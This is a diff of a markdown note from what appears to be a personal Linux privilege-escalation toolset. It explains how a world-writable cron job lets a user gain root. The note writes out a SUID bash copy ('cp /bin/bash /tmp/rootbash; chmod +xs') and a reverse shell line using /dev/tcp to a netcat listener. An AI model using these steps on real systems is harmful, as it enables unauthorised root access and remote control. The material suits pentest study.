GoochMagooch/privesc_toolset/linux_privesc/crontab.md

 If a cronjob is globally writeable, an underprivileged user can edit the contents to run malicious code.
-For example, you can spawn a root shell with a few steps:
+Since the cron job is executed with the permissions of its owner (often root), any inserted code will run with elevated privileges.

-- Edit the cronjob to copy the `/bin/bash/` directory into the `/tmp` directory as a binary named `rootbash` cp /bin/bash /tmp/rootbash chmod +xs /tmp/rootbash
+- Edit the cronjob to copy the `/bin/bash/` binary into the `/tmp` directory named `rootbash` cp /bin/bash /tmp/rootbash chmod +xs /tmp/rootbash

-  Executing the rootbash binary with the -p option (/tmp/rootbash -p) will spawn a shell, with persisting privileged permisions (root shell)
+  Executing the rootbash binary with the -p option (/tmp/rootbash -p) will spawn a shell, with persisting privileged permisions (in this case, root)

 - Edit the cronjob with a reverse shell to connect back to a netcat listener bash -i >& /dev/tcp/<local_ip>/1337 0>&1

   Host a netcat listener on your local machine.
-Once the cronjob runs, the victim machine will connect to your listener, as a root shell since the cronjob is running as root
+Once the cronjob runs, the victim machine will connect to your listener, with a mirrored privileged shell (in this case, root)

 ## Step one is to check if crontabs are exploitable ##